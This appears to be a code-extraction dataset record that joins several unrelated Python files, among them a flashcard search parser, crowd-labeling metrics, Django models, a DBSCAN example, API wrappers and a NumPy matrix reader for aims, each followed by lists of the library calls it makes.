[((1580, 1613), 'logging.getLogger', 'logging.getLogger', (['"""organization"""'], {}), "('organization')\n", (1597, 1613), False, 'import logging\n'), ((1634, 1669), 'os.path.join', 'os.path.join', (['target_dir', 'self.Name'], {}), '(target_dir, self.Name)\n', (1646, 1669), False, 'import os\n'), ((1678, 1701), 'utils.fileutil.mkdir_if_need', 'mkdir_if_need', (['self.Dir'], {}), '(self.Dir)\n', (1691, 1701), False, 'from utils.fileutil import mkdir_if_need\n'), ((2088, 2110), 'orgconfig.deploy.deploy_builder', 'deploy_builder', (['"""Peer"""'], {}), "('Peer')\n", (2102, 2110), False, 'from orgconfig.deploy import deploy_builder\n'), ((2258, 2283), 'orgconfig.deploy.deploy_builder', 'deploy_builder', (['"""Orderer"""'], {}), "('Orderer')\n", (2272, 2283), False, 'from orgconfig.deploy import deploy_builder\n')]
|
from datetime import datetime, timedelta
import re
from typing import Union, Callable, Any
import math
import functools
from uuid import uuid4
from .typing import IParserResult
ANY_OF = {"template", "front", "mnemonic", "entry", "deck", "tag"}
IS_DATE = {"created", "modified", "nextReview"}
IS_STRING = {"template", "front", "back", "mnemonic", "deck", "tag", "entry"}
class SearchParser:
def __init__(self):
self.error = None
self.is_ = set()
self.sort_by = None
self.desc = False
def parse(self, q: str) -> IParserResult:
try:
return IParserResult(
cond=self._parse(q),
is_=self.is_,
sortBy=self.sort_by,
desc=self.desc
)
except ValueError:
return IParserResult(cond=dict())
def _parse(self, q: str):
for method in [
self._remove_brackets,
self._parse_sep(" OR "),
self._parse_sep(" "),
self._parse_neg,
self._parse_full_expr,
self._parse_partial_expr
]:
try:
return method(q.strip())
except ValueError as e:
self.error = e
raise self.error
def _remove_brackets(self, q: str):
if re.fullmatch(r"\([^)]+\)", q):
return self._parse(q[1:-1])
raise ValueError("Not bracketed")
def _parse_sep(self, sep: str):
brackets = dict()
def _escape_brackets(m):
id_ = uuid4().hex
brackets[id_] = m.group(0)
return id_
def _parse_sep_inner(q: str):
q = re.sub(r"\([^)]+\)", _escape_brackets, q)
tokens = q.split(sep)
for i, t in enumerate(tokens):
for k, v in brackets.items():
tokens[i] = tokens[i].replace(k, v)
if len(tokens) >= 2:
parsed_tokens = list(filter(lambda x: x, (self._parse(t) for t in tokens)))
if len(parsed_tokens) > 1:
k = "$or" if sep == " OR " else "$and"
return {k: parsed_tokens}
elif len(parsed_tokens) == 1:
return parsed_tokens[0]
else:
return dict()
raise ValueError(f"Not separated by '{sep}'")
return _parse_sep_inner
def _parse_neg(self, q: str):
if q and q[0] == "-":
kw = "-sortBy:"
if q.startswith(kw) and q != kw:
self.sort_by = q[len(kw):]
return None
return {"$not": self._parse(q)}
raise ValueError("Not negative")
def _parse_full_expr(self, q: str):
m = re.fullmatch(r'([\w-]+)(:|~|[><]=?|=)([\w-]+|"[^"]+")', q)
if m:
k, op, v = m.groups()
if len(v) > 2 and v[0] == '"' and v[-1] == '"':
v = v[1:-1]
else:
m1 = re.fullmatch(r"\d+(?:\.\d+)?", v)
if m1:
v = float(v)
if k == "is":
if v == "due":
k = "nextReview"
op = "<="
v = str(datetime.now())
elif v == "leech":
k = "srsLevel"
op = "="
v = 0
elif v == "new":
k = "nextReview"
v = "NULL"
elif v == "marked":
k = "tag"
op = "="
v = "marked"
else:
self.is_ = v
return None
if k in {"due", "nextReview"} and op == ":":
k = "nextReview"
op = "<="
elif k in {"created", "modified"} and op == ":":
op = ">="
elif k == "sortBy":
self.sort_by = v
return None
if v == "NULL":
return {"$or": [
{k: ""},
{k: {"$exists": False}}
]}
if k in IS_DATE:
try:
v = str(datetime.now() + parse_timedelta(v))
if op == ":":
if k == "nextReview":
op = "<="
else:
op = ">="
except ValueError:
pass
if op == ":":
if isinstance(v, str) or k in IS_STRING:
v = {"$regex": re.escape(str(v))}
elif op == "~":
v = {"$regex": str(v)}
elif op == ">=":
v = {"$gte": v}
elif op == ">":
v = {"$gt": v}
elif op == "<=":
v = {"$lte": v}
elif op == "<":
v = {"$lt": v}
return {k: v}
raise ValueError("Not full expression")
@staticmethod
def _parse_partial_expr(q: str):
if q and ":" not in q:
or_cond = []
for a in ANY_OF:
if a in IS_STRING:
or_cond.append({a: {"$regex": re.escape(q)}})
else:
or_cond.append({a: q})
or_cond.append({"@*": {"$regex": re.escape(q)}})
return {"$or": or_cond}
raise ValueError("Not partial expression")
def mongo_filter(cond: Union[str, dict]) -> Callable[[dict], bool]:
if isinstance(cond, str):
cond = SearchParser().parse(cond).cond
return mongo_filter(cond)
def inner_filter(item: dict) -> bool:
for k, v in cond.items():
if k[0] == "$":
if k == "$and":
return all(mongo_filter(x)(item) for x in v)
elif k == "$or":
return any(mongo_filter(x)(item) for x in v)
elif k == "$not":
return not mongo_filter(v)(item)
else:
item_k = dot_getter(item, k)
if isinstance(v, dict) and any(k0[0] == "$" for k0 in v.keys()):
return _mongo_compare(item_k, v)
elif isinstance(item_k, list):
if v not in item_k:
return False
elif item_k != v:
return False
return True
return inner_filter
def parse_timedelta(s: str) -> timedelta:
if s == "NOW":
return timedelta()
m = re.search("([-+]?\\d+)(\\S*)", s)
if m:
if m[2] in {"m", "min"}:
return timedelta(minutes=int(m[1]))
elif m[2] in {"h", "hr"}:
return timedelta(hours=int(m[1]))
elif m[2] in {"d"}:
return timedelta(days=int(m[1]))
elif m[2] in {"w", "wk"}:
return timedelta(weeks=int(m[1]))
elif m[2] in {"M", "mo"}:
return timedelta(days=30 * int(m[1]))
elif m[2] in {"y", "yr"}:
return timedelta(days=365 * int(m[1]))
raise ValueError("Invalid timedelta")
def sorter(sort_by: str, desc: bool) -> Callable[[Any], bool]:
def pre_cmp(a, b):
m = _sort_convert(a)
n = _sort_convert(b)
if isinstance(m, (float, int, str)):
if type(m) == type(n):
return 1 if m > n else 0 if m == n else -1
elif isinstance(m, str):
return 1
else:
return -1
else:
return 0
return functools.cmp_to_key(lambda x, y: -pre_cmp(dot_getter(x, sort_by, False), dot_getter(y, sort_by, False))
if desc else pre_cmp(dot_getter(x, sort_by, False), dot_getter(y, sort_by, False)))
def dot_getter(d: dict, k: str, get_data: bool = True) -> Any:
if k[0] == "@":
return data_getter(d, k[1:])
v = d
for kn in k.split("."):
if isinstance(v, dict):
if kn == "*":
v = list(v.values())
else:
v = v.get(kn, dict())
elif isinstance(v, list):
try:
v = v[int(kn)]
except (IndexError, ValueError):
v = None
break
else:
break
if isinstance(v, dict) and len(v) == 0:
v = None
if get_data and k not in {"nextReview", "srsLevel"}:
data = data_getter(d, k)
if data is not None:
if v is not None:
if isinstance(data, list):
if isinstance(v, list):
v = [*v, *data]
elif v is not None:
v = [v, *data]
else:
v = data
else:
if isinstance(v, list):
v = [*v, data]
elif v is not None:
v = [v, data]
else:
v = data
else:
v = data
return v
def data_getter(d: dict, k: str) -> Union[str, None]:
k = k.lower()
try:
if k == "*":
# noinspection PyTypeChecker
return [v0["value"] for v0 in d["data"] if not v0["value"].startswith("@nosearch\n")]
else:
if d["data"]:
for v0 in d["data"]:
if v0["key"].lower() == k:
return v0["value"]
except AttributeError:
pass
return None
def _mongo_compare(v, v_obj: dict) -> bool:
for op, v0 in v_obj.items():
try:
if op == "$regex":
if isinstance(v, list):
return any(re.search(str(v0), str(b), flags=re.IGNORECASE) for b in v)
else:
return re.search(str(v0), str(v), flags=re.IGNORECASE) is not None
elif op == "$substr":
if isinstance(v, list):
return any(str(v0) in str(b) for b in v)
else:
return str(v0) in str(v)
elif op == "$startswith":
if isinstance(v, list):
return any(str(b).startswith(str(v0)) for b in v)
else:
return str(v).startswith(str(v0))
elif op == "$exists":
return (v is not None) == v0
else:
try:
_v = int(v)
_v0 = int(v0)
v, v0 = _v, _v0
except ValueError:
pass
if op == "$gte":
return v >= v0
elif op == "$gt":
return v > v0
elif op == "$lte":
return v <= v0
elif op == "$lt":
return v < v0
except TypeError:
pass
return False
def _sort_convert(x) -> Union[float, str]:
if x is None:
return -math.inf
elif isinstance(x, bool):
return math.inf if x else -math.inf
elif isinstance(x, int):
return float(x)
return str(x)
|
[
"uuid.uuid4",
"re.fullmatch",
"datetime.datetime.now",
"re.escape",
"datetime.timedelta",
"re.search",
"re.sub"
] |
[((6586, 6619), 're.search', 're.search', (['"""([-+]?\\\\d+)(\\\\S*)"""', 's'], {}), "('([-+]?\\\\d+)(\\\\S*)', s)\n", (6595, 6619), False, 'import re\n'), ((1315, 1345), 're.fullmatch', 're.fullmatch', (['"""\\\\([^)]+\\\\)"""', 'q'], {}), "('\\\\([^)]+\\\\)', q)\n", (1327, 1345), False, 'import re\n'), ((2757, 2816), 're.fullmatch', 're.fullmatch', (['"""([\\\\w-]+)(:|~|[><]=?|=)([\\\\w-]+|"[^"]+")"""', 'q'], {}), '(\'([\\\\w-]+)(:|~|[><]=?|=)([\\\\w-]+|"[^"]+")\', q)\n', (2769, 2816), False, 'import re\n'), ((6565, 6576), 'datetime.timedelta', 'timedelta', ([], {}), '()\n', (6574, 6576), False, 'from datetime import datetime, timedelta\n'), ((1673, 1715), 're.sub', 're.sub', (['"""\\\\([^)]+\\\\)"""', '_escape_brackets', 'q'], {}), "('\\\\([^)]+\\\\)', _escape_brackets, q)\n", (1679, 1715), False, 'import re\n'), ((1544, 1551), 'uuid.uuid4', 'uuid4', ([], {}), '()\n', (1549, 1551), False, 'from uuid import uuid4\n'), ((2992, 3027), 're.fullmatch', 're.fullmatch', (['"""\\\\d+(?:\\\\.\\\\d+)?"""', 'v'], {}), "('\\\\d+(?:\\\\.\\\\d+)?', v)\n", (3004, 3027), False, 'import re\n'), ((3235, 3249), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (3247, 3249), False, 'from datetime import datetime, timedelta\n'), ((5379, 5391), 're.escape', 're.escape', (['q'], {}), '(q)\n', (5388, 5391), False, 'import re\n'), ((4222, 4236), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (4234, 4236), False, 'from datetime import datetime, timedelta\n'), ((5252, 5264), 're.escape', 're.escape', (['q'], {}), '(q)\n', (5261, 5264), False, 'import re\n')]
|
from typing import Any, Optional, Union
import numpy as np
import pandas as pd
from crowdkit.aggregation.base_aggregator import BaseAggregator
from crowdkit.aggregation import MajorityVote
def _check_answers(answers: pd.DataFrame) -> None:
if not isinstance(answers, pd.DataFrame):
raise TypeError('Working only with pandas DataFrame')
assert 'task' in answers, 'There is no "task" column in answers'
assert 'performer' in answers, 'There is no "performer" column in answers'
assert 'label' in answers, 'There is no "label" column in answers'
def _label_probability(row: pd.Series, label: Any, n_labels: int) -> float:
"""Numerator in the Bayes formula"""
return row['skill'] if row['label'] == label else (1.0 - row['skill']) / (n_labels - 1)
def _task_consistency(row: pd.Series) -> float:
"""Posterior probability for a single task"""
return row[row['aggregated_label']] / row['denominator'] if row['denominator'] != 0 else 0.0
def consistency(answers: pd.DataFrame,
performers_skills: Optional[pd.Series] = None,
aggregator: BaseAggregator = MajorityVote(),
by_task: bool = False) -> Union[float, pd.Series]:
"""
Consistency metric: posterior probability of aggregated label given performers skills
calculated using standard Dawid-Skene model.
Args:
answers (pandas.DataFrame): A data frame containing `task`, `performer` and `label` columns.
performers_skills (Optional[pandas.Series]): performers skills e.g. golden set skills. If not provided,
uses aggregator's `performers_skills` attribute.
aggregator (aggregation.BaseAggregator): aggregation method, default: MajorityVote
by_task (bool): if set, returns consistencies for every task in provided data frame.
Returns:
Union[float, pd.Series]
"""
_check_answers(answers)
aggregated = aggregator.fit_predict(answers)
if performers_skills is None and hasattr(aggregator, 'skills_'):
performers_skills = aggregator.skills_
else:
raise AssertionError('This aggregator is not supported. Please, provide performers skills.')
answers = answers.copy(deep=False)
answers.set_index('task', inplace=True)
answers = answers.reset_index().set_index('performer')
answers['skill'] = performers_skills
answers.reset_index(inplace=True)
labels = pd.unique(answers.label)
for label in labels:
answers[label] = answers.apply(lambda row: _label_probability(row, label, len(labels)), axis=1)
labels_proba = answers.groupby('task').prod()
labels_proba['aggregated_label'] = aggregated
labels_proba['denominator'] = labels_proba[list(labels)].sum(axis=1)
consistecies = labels_proba.apply(_task_consistency, axis=1)
if by_task:
return consistecies
else:
return consistecies.mean()
def _task_uncertainty(row, labels):
if row['denominator'] == 0:
row[labels] = 1 / len(labels)
else:
row[labels] /= row['denominator']
softmax = row[labels]
log_softmax = np.log(row[list(labels)])
return -np.sum(softmax * log_softmax)
def uncertainty(answers, performers_skills, by_task: bool = False) -> Union[float, pd.Series]:
"""
Label uncertainty metric: entropy of labels probability distribution.
Args:
answers (pandas.DataFrame): A data frame containing `task`, `performer` and `label` columns.
performers_skills (pandas.Series): performers skills e.g. golden set skills. If not provided,
uses aggregator's `performers_skills` attribute.
by_task (bool): if set, returns consistencies for every task in provided data frame.
Returns:
Union[float, pd.Series]
"""
_check_answers(answers)
answers = answers.copy(deep=False)
answers.set_index('task', inplace=True)
answers = answers.reset_index().set_index('performer')
answers['skill'] = performers_skills
answers.reset_index(inplace=True)
labels = pd.unique(answers.label)
for label in labels:
answers[label] = answers.apply(lambda row: _label_probability(row, label, len(labels)), axis=1)
labels_proba = answers.groupby('task').prod()
labels_proba['denominator'] = labels_proba[list(labels)].sum(axis=1)
uncertainties = labels_proba.apply(lambda row: _task_uncertainty(row, list(labels)), axis=1)
if by_task:
return uncertainties
else:
return uncertainties.mean()
|
[
"crowdkit.aggregation.MajorityVote",
"numpy.sum",
"pandas.unique"
] |
[((1127, 1141), 'crowdkit.aggregation.MajorityVote', 'MajorityVote', ([], {}), '()\n', (1139, 1141), False, 'from crowdkit.aggregation import MajorityVote\n'), ((2446, 2470), 'pandas.unique', 'pd.unique', (['answers.label'], {}), '(answers.label)\n', (2455, 2470), True, 'import pandas as pd\n'), ((4086, 4110), 'pandas.unique', 'pd.unique', (['answers.label'], {}), '(answers.label)\n', (4095, 4110), True, 'import pandas as pd\n'), ((3170, 3199), 'numpy.sum', 'np.sum', (['(softmax * log_softmax)'], {}), '(softmax * log_softmax)\n', (3176, 3199), True, 'import numpy as np\n')]
|
from __future__ import unicode_literals, absolute_import
from django.contrib import admin
from . import models
@admin.register(models.Annotation)
class AnnotationAdmin(admin.ModelAdmin):
search_fields = ('text',)
fields = (
'user',
'text_object',
'annotator_schema_version',
'text',
'quote',
'uri',
'range_start',
'range_end',
'range_start_offset',
'range_end_offset',
'tags',
)
|
[
"django.contrib.admin.register"
] |
[((116, 149), 'django.contrib.admin.register', 'admin.register', (['models.Annotation'], {}), '(models.Annotation)\n', (130, 149), False, 'from django.contrib import admin\n')]
|
# Copyright 2021 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from sklearnex import patch_sklearn
patch_sklearn()
import numpy as np
from sklearn.cluster import DBSCAN
from daal4py.oneapi import sycl_context
X = np.array([[1., 2.], [2., 2.], [2., 3.],
[8., 7.], [8., 8.], [25., 80.]], dtype=np.float32)
with sycl_context("gpu"):
clustering = DBSCAN(eps=3, min_samples=2).fit(X)
print("DBSCAN components: ", clustering.components_, "\nDBSCAN labels: ",clustering.labels_)
resultsDict = {}
resultsDict['X'] = X
resultsDict['labels'] = clustering.labels_
resultsDict['components'] = clustering.components_
import pickle
with open('resultsDict.pkl', 'wb') as handle:
pickle.dump(resultsDict, handle, protocol=pickle.HIGHEST_PROTOCOL)
|
[
"pickle.dump",
"numpy.array",
"daal4py.oneapi.sycl_context",
"sklearnex.patch_sklearn",
"sklearn.cluster.DBSCAN"
] |
[((620, 635), 'sklearnex.patch_sklearn', 'patch_sklearn', ([], {}), '()\n', (633, 635), False, 'from sklearnex import patch_sklearn\n'), ((736, 842), 'numpy.array', 'np.array', (['[[1.0, 2.0], [2.0, 2.0], [2.0, 3.0], [8.0, 7.0], [8.0, 8.0], [25.0, 80.0]]'], {'dtype': 'np.float32'}), '([[1.0, 2.0], [2.0, 2.0], [2.0, 3.0], [8.0, 7.0], [8.0, 8.0], [25.0,\n 80.0]], dtype=np.float32)\n', (744, 842), True, 'import numpy as np\n'), ((844, 863), 'daal4py.oneapi.sycl_context', 'sycl_context', (['"""gpu"""'], {}), "('gpu')\n", (856, 863), False, 'from daal4py.oneapi import sycl_context\n'), ((1208, 1274), 'pickle.dump', 'pickle.dump', (['resultsDict', 'handle'], {'protocol': 'pickle.HIGHEST_PROTOCOL'}), '(resultsDict, handle, protocol=pickle.HIGHEST_PROTOCOL)\n', (1219, 1274), False, 'import pickle\n'), ((882, 910), 'sklearn.cluster.DBSCAN', 'DBSCAN', ([], {'eps': '(3)', 'min_samples': '(2)'}), '(eps=3, min_samples=2)\n', (888, 910), False, 'from sklearn.cluster import DBSCAN\n')]
|
#!/usr/bin/python3
from django.core.validators import MinValueValidator, MaxValueValidator
from django.db import models
class SolenoidValve(models.Model):
"""
Model for the solenoid valves in database
"""
number = models.IntegerField(validators=[MinValueValidator(1),
MaxValueValidator(6)])
step = models.IntegerField()
first_pin = models.IntegerField()
second_pin = models.IntegerField()
class Bottle(models.Model):
"""
Model for the bottles in database
"""
name = models.CharField(max_length=80)
empty = models.BooleanField(default=False)
image = models.ImageField(upload_to='bottle_picture', blank=True, null=True, )
solenoid_valve = models.OneToOneField(SolenoidValve, on_delete=models.CASCADE)
def __str__(self):
return self.name
class Cocktail(models.Model):
"""
Model for the cocktails in database
"""
name = models.CharField(max_length=80)
description = models.TextField()
bottles = models.ManyToManyField(Bottle,
through='BottlesBelongsCocktails',
related_name='cocktails')
image = models.ImageField(upload_to='cocktail_picture', blank=True, null=True, )
def __str__(self):
return self.name
class BottlesBelongsCocktails(models.Model):
"""
Model for the relation many to many between cocktail and bottle
"""
bottle = models.ForeignKey(Bottle, on_delete=models.CASCADE)
cocktail = models.ForeignKey(Cocktail, on_delete=models.CASCADE)
dose = models.IntegerField()
@property
def bottle_detail(self):
"""
:return the name of bottle
"""
return '{}'.format(self.bottle)
@property
def cocktail_detail(self):
"""
:return the name of cocktail
"""
return '{}'.format(self.cocktail)
@property
def dose_detail(self):
"""
:return the number of dose
"""
return '{}'.format(self.dose)
def __str__(self):
return str(self.dose)
|
[
"django.db.models.OneToOneField",
"django.db.models.TextField",
"django.db.models.ManyToManyField",
"django.db.models.CharField",
"django.db.models.ForeignKey",
"django.core.validators.MinValueValidator",
"django.db.models.BooleanField",
"django.db.models.ImageField",
"django.db.models.IntegerField",
"django.core.validators.MaxValueValidator"
] |
[((365, 386), 'django.db.models.IntegerField', 'models.IntegerField', ([], {}), '()\n', (384, 386), False, 'from django.db import models\n'), ((403, 424), 'django.db.models.IntegerField', 'models.IntegerField', ([], {}), '()\n', (422, 424), False, 'from django.db import models\n'), ((442, 463), 'django.db.models.IntegerField', 'models.IntegerField', ([], {}), '()\n', (461, 463), False, 'from django.db import models\n'), ((562, 593), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(80)'}), '(max_length=80)\n', (578, 593), False, 'from django.db import models\n'), ((606, 640), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)'}), '(default=False)\n', (625, 640), False, 'from django.db import models\n'), ((653, 721), 'django.db.models.ImageField', 'models.ImageField', ([], {'upload_to': '"""bottle_picture"""', 'blank': '(True)', 'null': '(True)'}), "(upload_to='bottle_picture', blank=True, null=True)\n", (670, 721), False, 'from django.db import models\n'), ((745, 806), 'django.db.models.OneToOneField', 'models.OneToOneField', (['SolenoidValve'], {'on_delete': 'models.CASCADE'}), '(SolenoidValve, on_delete=models.CASCADE)\n', (765, 806), False, 'from django.db import models\n'), ((958, 989), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(80)'}), '(max_length=80)\n', (974, 989), False, 'from django.db import models\n'), ((1008, 1026), 'django.db.models.TextField', 'models.TextField', ([], {}), '()\n', (1024, 1026), False, 'from django.db import models\n'), ((1041, 1136), 'django.db.models.ManyToManyField', 'models.ManyToManyField', (['Bottle'], {'through': '"""BottlesBelongsCocktails"""', 'related_name': '"""cocktails"""'}), "(Bottle, through='BottlesBelongsCocktails',\n related_name='cocktails')\n", (1063, 1136), False, 'from django.db import models\n'), ((1219, 1289), 'django.db.models.ImageField', 'models.ImageField', ([], {'upload_to': '"""cocktail_picture"""', 'blank': '(True)', 'null': '(True)'}), "(upload_to='cocktail_picture', blank=True, null=True)\n", (1236, 1289), False, 'from django.db import models\n'), ((1489, 1540), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Bottle'], {'on_delete': 'models.CASCADE'}), '(Bottle, on_delete=models.CASCADE)\n', (1506, 1540), False, 'from django.db import models\n'), ((1556, 1609), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Cocktail'], {'on_delete': 'models.CASCADE'}), '(Cocktail, on_delete=models.CASCADE)\n', (1573, 1609), False, 'from django.db import models\n'), ((1621, 1642), 'django.db.models.IntegerField', 'models.IntegerField', ([], {}), '()\n', (1640, 1642), False, 'from django.db import models\n'), ((264, 284), 'django.core.validators.MinValueValidator', 'MinValueValidator', (['(1)'], {}), '(1)\n', (281, 284), False, 'from django.core.validators import MinValueValidator, MaxValueValidator\n'), ((331, 351), 'django.core.validators.MaxValueValidator', 'MaxValueValidator', (['(6)'], {}), '(6)\n', (348, 351), False, 'from django.core.validators import MinValueValidator, MaxValueValidator\n')]
|
import smtplib #Python Library
print("Subject?")
sub=input() #Used to take subject
print("Body?")
message = input() #Used for taking message for email
print("Recipient")
receivers_mail = input() #Used to take receiver's mail
print("Sender's Mail?")
sender_mail= input() #Used to take sender's mail
try:
password = input('Enter the password') #Enter password of sender's email ID
smtpObj = smtplib.SMTP('gmail.com',587)
smtpObj.login(sender_mail,password)
smtpObj.sendmail(sender_mail, receivers_mail, message)
print("Successfully sent email") #If the email is sent successfullt
except Exception:
print("Error: unable to send email") #If the email is not successful
|
[
"smtplib.SMTP"
] |
[((470, 500), 'smtplib.SMTP', 'smtplib.SMTP', (['"""gmail.com"""', '(587)'], {}), "('gmail.com', 587)\n", (482, 500), False, 'import smtplib\n')]
|
import requests
from endpoints.projects import Projects
from endpoints.lists import Lists
from endpoints.todos import Todos
from endpoints.labels import Labels
class Tracked:
def __init__(self, email_address: str, api_token: str, basecamp_account_id: int):
self.email_address = email_address
self.api_token = api_token
self.basecamp_account_id = basecamp_account_id
self.session = requests.Session()
@property
def projects(self):
return Projects(self)
@property
def lists(self):
return Lists(self)
@property
def todos(self):
return Todos(self)
@property
def labels(self):
return Labels(self)
"""
========================================================
Examples
========================================================
tracked = Tracked(...)
# === PROJECTS ===
# Get all projects
tracked.projects.list()
# === LISTS ===
# Get all lists for a project
tracked.lists.list(project_id)
# === TODOS ===
# List todos from project
tracked.todos.list(project_id)
# Update Kanban list and/or position for a to-do
tracked.todos.update(project_id, todo_id, position, list_name)
# === LABELS ===
# Create a label
tracked.labels.create(project_id, "TestLabel", "#00ffff")
# List labels
tracked.labels.list(project_id)
# Add a label to a todo
tracked.labels.add(project_id, label_id, todo_id)
# Get labels of a todo
tracked.labels.get(basecamp_project_id, basecamp_todo_id)
========================================================
"""
|
[
"endpoints.projects.Projects",
"requests.Session",
"endpoints.lists.Lists",
"endpoints.todos.Todos",
"endpoints.labels.Labels"
] |
[((420, 438), 'requests.Session', 'requests.Session', ([], {}), '()\n', (436, 438), False, 'import requests\n'), ((493, 507), 'endpoints.projects.Projects', 'Projects', (['self'], {}), '(self)\n', (501, 507), False, 'from endpoints.projects import Projects\n'), ((559, 570), 'endpoints.lists.Lists', 'Lists', (['self'], {}), '(self)\n', (564, 570), False, 'from endpoints.lists import Lists\n'), ((622, 633), 'endpoints.todos.Todos', 'Todos', (['self'], {}), '(self)\n', (627, 633), False, 'from endpoints.todos import Todos\n'), ((686, 698), 'endpoints.labels.Labels', 'Labels', (['self'], {}), '(self)\n', (692, 698), False, 'from endpoints.labels import Labels\n')]
|
from django.contrib import admin
from .models import Blog
# Blog information
class BlogAdmin(admin.ModelAdmin):
list_display = (
'name',
'author',
'description',
'image',
)
ordering = ('name',)
admin.site.register(Blog, BlogAdmin)
|
[
"django.contrib.admin.site.register"
] |
[((244, 280), 'django.contrib.admin.site.register', 'admin.site.register', (['Blog', 'BlogAdmin'], {}), '(Blog, BlogAdmin)\n', (263, 280), False, 'from django.contrib import admin\n')]
|
import requests # Pega informações de API's
from datetime import datetime # Data e hora atual
from openpyxl import Workbook # Cria arquivo Excel
from openpyxl.styles import Alignment, Font # Estilos para células
import pandas as pd # Nesse caso, estou usando p/ transformar em html
# Busca as informações do site
requisicao = requests.get(
"https://economia.awesomeapi.com.br/last/USD-BRL,EUR-BRL,BTC-BRL")
# Converte para json
dados = requisicao.json()
# Pegando os dados: dólar, euro e bitcoin
cotacao_dolar = dados["USDBRL"]["bid"]
cotacao_euro = dados["EURBRL"]["bid"]
cotacao_bitcoin = dados["BTCBRL"]["bid"]
# Criando um arquivo cotacao.xlsx
wb = Workbook()
tabela = wb.active
# Título da tabela
tabela.title = "Cotacao Moedas"
# Nomeando as Células
tabela["A1"] = "Moedas"
tabela["B1"] = "Cotação"
tabela["C1"] = "Última Atualização"
# Nome das moedas
tabela["A2"] = "Dólar"
tabela["A3"] = "Euro"
tabela["A4"] = "Bitcoin"
# Valor das cotações
tabela["B2"] = float(cotacao_dolar)
tabela["B3"] = float(cotacao_euro)
tabela["B4"] = float(cotacao_bitcoin)
# Formatação da data atual
tabela["C2"] = datetime.now().strftime("Às %Hh:%Mm:%Ss - %d/%m/%Y")
tabela["C3"] = datetime.now().strftime("Às %Hh:%Mm:%Ss - %d/%m/%Y")
tabela["C4"] = datetime.now().strftime("Às %Hh:%Mm:%Ss - %d/%m/%Y")
# Alinha todas as células preenchidas
celulas = ["a", "b", "c"]
for letra in celulas:
for i in range(1, 5):
if i == 1:
# Deixa a primeira linha em negrito
tabela[letra+str(i)].font = Font(bold=True)
tabela[letra+str(i)].alignment = Alignment("center", "center")
# Salvando a planilha
wb.save("cotacao.xlsx")
# Transformando em html, caso queira enviar para e-mails.
tabela = pd.read_excel("cotacao.xlsx")
tabela.to_html("cotacao.html")
print(tabela)
|
[
"openpyxl.Workbook",
"openpyxl.styles.Font",
"pandas.read_excel",
"openpyxl.styles.Alignment",
"requests.get",
"datetime.datetime.now"
] |
[((332, 411), 'requests.get', 'requests.get', (['"""https://economia.awesomeapi.com.br/last/USD-BRL,EUR-BRL,BTC-BRL"""'], {}), "('https://economia.awesomeapi.com.br/last/USD-BRL,EUR-BRL,BTC-BRL')\n", (344, 411), False, 'import requests\n'), ((666, 676), 'openpyxl.Workbook', 'Workbook', ([], {}), '()\n', (674, 676), False, 'from openpyxl import Workbook\n'), ((1730, 1759), 'pandas.read_excel', 'pd.read_excel', (['"""cotacao.xlsx"""'], {}), "('cotacao.xlsx')\n", (1743, 1759), True, 'import pandas as pd\n'), ((1119, 1133), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (1131, 1133), False, 'from datetime import datetime\n'), ((1187, 1201), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (1199, 1201), False, 'from datetime import datetime\n'), ((1255, 1269), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (1267, 1269), False, 'from datetime import datetime\n'), ((1585, 1614), 'openpyxl.styles.Alignment', 'Alignment', (['"""center"""', '"""center"""'], {}), "('center', 'center')\n", (1594, 1614), False, 'from openpyxl.styles import Alignment, Font\n'), ((1528, 1543), 'openpyxl.styles.Font', 'Font', ([], {'bold': '(True)'}), '(bold=True)\n', (1532, 1543), False, 'from openpyxl.styles import Alignment, Font\n')]
|
from flask import Flask, render_template
# create a flask application name app
app = Flask(__name__)
@app.route("/")
def index():
return render_template('index.html')
if __name__=="__main__":
app.run(debug=True)
|
[
"flask.Flask",
"flask.render_template"
] |
[((86, 101), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (91, 101), False, 'from flask import Flask, render_template\n'), ((143, 172), 'flask.render_template', 'render_template', (['"""index.html"""'], {}), "('index.html')\n", (158, 172), False, 'from flask import Flask, render_template\n')]
|
import numpy as np
import atexit
import sys
aims = sys.modules['soma.aims']
'''
IO formats readers / writers written in python for aims.
Currently:
Numpy format for matrices
'''
class NpyFormat(aims.FileFormat_SparseOrDenseMatrix):
def read(self, filename, obj, context, options=None):
mat = np.load(filename)
# currently we need to perform a full copy of the array because
# we cannot prevent it from deleting (when getting back to the C++
# layer the python wrapper is destroyed and any references it holds
# also disapear.
# Or we should manually increment the ref counter in the numpy PyObject
# but it would never be destroyed then.
#vol = aims.Volume(mat)
#vol._npy = mat
vol = aims.Volume(mat.shape, dtype=mat.dtype)
np.asarray(vol)[:, :, 0, 0] = mat
if isinstance(obj, aims.carto.AllocatorContext):
# return the object variant
options = context
context = obj
obj = aims.SparseOrDenseMatrix()
obj.setMatrix(vol)
return obj
# otherwise fill in obj
obj.setMatrix(vol)
return True
def write(self, filename, obj, options):
mat = np.asarray(obj.asDense())
np.save(filename, mat)
hdr = obj.header()
aims.write(hdr, '%s.minf' % filename)
return True
class NpyFinderFormat(aims.FinderFormat):
def check(self, filename, finder):
if filename.endswith('.npy'):
hdr = {
'file_type': 'NPY',
'object_type': 'SparseMatrix',
'data_type': 'DOUBLE',
}
finder.setHeader(hdr)
finder.setObjectType('SparseMatrix')
finder.setDataType('DOUBLE')
return True
return False
def remove_python_formats():
aims.Finder.unregisterFormat('NUMPY')
aims.FileFormatDictionary_SparseOrDenseMatrix.unregisterFormat('NUMPY')
aims.Finder.registerFormat('NUMPY', NpyFinderFormat(), ['npy'])
aims.FileFormatDictionary_SparseOrDenseMatrix.registerFormat(
